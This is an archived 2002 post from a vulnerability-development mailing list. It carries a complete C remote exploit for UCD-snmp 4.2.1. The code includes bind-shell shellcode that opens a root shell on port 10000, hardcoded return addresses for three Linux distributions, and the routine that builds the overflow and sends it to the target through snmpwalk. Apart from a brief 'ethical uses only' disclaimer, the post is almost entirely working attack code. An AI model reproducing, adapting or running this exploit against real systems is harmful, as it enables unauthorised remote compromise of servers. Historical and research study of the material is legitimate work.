Vulnerability Development mailing list archives
UCD-snmp 4.2.1 exploit - proof of concept
From: zenparse () gmx net
Date: Tue, 19 Feb 2002 05:26:30 +0100 (MET)
/*
UCD-snmp 4.2.1 remote exploit
since this leaked, i have no reason to hold it from the
securityfocus infosec scene anymore... you need snmpwalk
in your local directory to make it work..
use ethically for penetration tests or other lucrative
activities only.
zen-parse
"revealing hacker secrets since 1998 - it takes a hacker
to protect you from a hacker"
greets: My man Brian McWilliams (The voice of the underground)
numacra, The metaray,DWalrus, JimJones AKA GOBBLES, Kimble (the man cant
keep you down big boy), The Shadow Knight(#shells won't be the same without
ya)...
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
char code[] =
"\x31\xc0" // xor eax, eax
"\x31\xdb" // xor ebx, ebx
"\x89\xe5" // mov ebp, esp
"\x99" // cdq
"\xb0\x66" // mov al, 102
"\x89\x5d\xfc" // mov [ebp-4], ebx
"\x43" // inc ebx
"\x89\x5d\xf8" // mov [ebp-8], ebx
"\x43" // inc ebx
"\x89\x5d\xf4" // mov [ebp-12], ebx
"\x4b" // dec ebx
"\x8d\x4d\xf4" // lea ecx, [ebp-12]
"\xcd\x80" // int 80h
"\x89\x45\xf4" // mov [ebp-12], eax
"\x43" // inc ebx
"\x66\x89\x5d\xec" // mov [ebp-20], bx
"\x66\xc7\x45\xee\x27\x10" // mov [ebp-18], word 4135
"\x89\x55\xf0" // mov [ebp-16], edx
"\x8d\x45\xec" // lea eax, [ebp-20]
"\x89\x45\xf8" // mov [ebp-8], eax
"\xc6\x45\xfc\x10" // mov [ebp-4], byte 16
"\xb2\x66" // mov dl, 102
"\x89\xd0" // mov eax, ed
"\x8d\x4d\xf4" // lea ecx, [ebp-12]
"\xcd\x80" // int 80h
"\x89\xd0" // mov eax, edx
"\xb3\x04" // mov bl, 4
"\xcd\x80" // int 80h
"\x43" // inc ebx
"\x89\xd0" // mov eax, edx
"\x99" // cdq
"\x89\x55\xf8" // mov [ebp-8], edx
"\x89\x55\xfc" // mov [ebp-4], edx
"\xcd\x80" // int 80h
"\x31\xc9" // xor ecx, ecx
"\x89\xc3" // mov ebx, eax
"\xb1\x03" // mov cl, 3
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop -7
"\x52" // push edx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x52" // push edx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\x0b" // mov al, 11
"\xcd\x80"; // int 80h
struct {
char *name;
unsigned long ret_addr;
int psn1;
int psn2;
int psn3;
int offset;
}
targets[] = {
{ "UCD-snmp 4.2.1, Slackware 7.0", 0xbfffc560, 148, 160, 164, 0},
{ "UCD-snmp 4.2.1, Redhat 6.2", 0x807dc64, 244, 240, 244, 4},
{ "UCD-snmp 4.2.1, Suse 7.2", 0xbfffc76c, 152,152,152,0},
{ NULL, 0}
};
void usage(char *p)
{
int i;
fprintf(stderr,
"*************************************************************\n");
fprintf(stderr,
"*************************************************************\n");
fprintf(stderr, " SNMP EXPLOITATION PROOF OF CONCEPT - ETHICAL USES
ONLY\n");
fprintf(stderr, "usage: %s [-t type] [-p port] [-o offset] [-w path]
<host>\n", p);
fprintf(stderr, "-t: target number\n");
fprintf(stderr, "-p: port of snmp \n");
fprintf(stderr, "-o: offset\n");
fprintf(stderr, "-w: path to snmpwalk (default is cwd)\n\n");
fprintf(stderr, "Target Types:\n");
for(i = 0; targets[i].name; i++)
fprintf(stderr, "%d) %s\n", i, targets[i].name);
fprintf(stderr, "exploit opens shell on port 10000\n");
fprintf(stderr, "\n");
fprintf(stderr,
"*************************************************************\n");
fprintf(stderr,
"*************************************************************\n");
exit(0);
}
int main(int argc, char **argv) {
char buf[512];
struct stat boo;
char *host, *path;
int c, type=0, offset=0;
char port[6] = "161";
while((c = getopt(argc, argv, "t:o:p:w:")) != EOF){
switch(c){
case 't':
type = atoi(optarg);
if(type < 0 || type > sizeof(targets)){
fprintf(stderr, "invalid target type\n");
usage(argv[0]);
}
case 'o':
offset = atoi(optarg);
break;
case 'p':
strncpy(port, optarg, 5);
break;
case 'w':
path = (char *)malloc(sizeof(optarg));
strncpy(path, optarg, strlen(optarg)-1);
break;
}
}
if(!argv[optind])
usage(argv[0]);
host = argv[optind];
memset(buf, 0x90, 256);
memcpy(buf+targets[type].psn1,(void *) &targets[type].ret_addr, 4);
memcpy(buf+targets[type].psn2,(void *) &targets[type].ret_addr, 4);
memcpy(buf+targets[type].psn3,(void *) &targets[type].ret_addr, 4);
buf[256] = 0x00;
memcpy(buf+targets[type].offset, code, sizeof(code)-1);
execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL);
}
--
GMX - Die Kommunikationsplattform im Internet.
http://www.gmx.net
Current thread:
- UCD-snmp 4.2.1 exploit - proof of concept zenparse (Feb 18)
- Re: UCD-snmp 4.2.1 exploit - proof of concept Blue Boar (Feb 19)
- <Possible follow-ups>
- re: UCD-snmp 4.2.1 exploit - proof of concept zen-parse (Feb 19)
- Re: UCD-snmp 4.2.1 exploit - proof of concept xbud (Feb 19)
- RE: UCD-snmp 4.2.1 exploit - proof of concept Mike Tone (Feb 19)